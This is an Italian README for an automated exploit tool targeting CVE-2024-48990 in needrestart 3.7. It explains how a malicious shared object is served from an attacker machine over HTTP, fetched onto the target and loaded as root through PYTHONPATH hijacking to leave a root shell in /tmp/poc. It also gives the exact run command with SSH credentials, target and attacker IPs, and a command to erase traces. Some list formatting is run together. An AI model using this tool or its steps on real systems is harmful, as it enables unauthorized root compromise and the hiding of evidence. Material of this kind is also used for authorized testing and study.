
Exploit automatizzato di escalation dei privilegi locali per CVE-2024-48990 (needrestart v3.7), che sfrutta l'hijacking di PYTHONPATH per ottenere accesso root.
Questo strumento automatizza lo sfruttamento di una vulnerabilità di escalation dei privilegi in needrestart versione 3.7, identificata come CVE-2024-48990.
Ottiene l'esecuzione come root sfruttando l'uso non sicuro della variabile d'ambiente PYTHONPATH quando needrestart analizza i processi Python.
L'exploit funziona:
__init__.so) che viene attivato all'importazione..so tramite un server HTTP locale.PYTHONPATH malevolo.importlib.needrestart, che eredita il PYTHONPATH manipolato, carica il modulo malevolo ed esegue il payload come root./tmp/poc), consentendo l'accesso a una shell root.Esegui l'exploit dalla tua macchina attaccante:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Parametri:
needrestart versione 3.7Per rimuovere le tracce dell'exploit dal target:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (per compilare il payload)python3 -m http.server (avviato automaticamente dallo script)needrestart (v3.7)sudo NOPASSWD per /usr/sbin/needrestartcurl installatiQuesto strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo su sistemi che non possiedi o senza autorizzazione esplicita.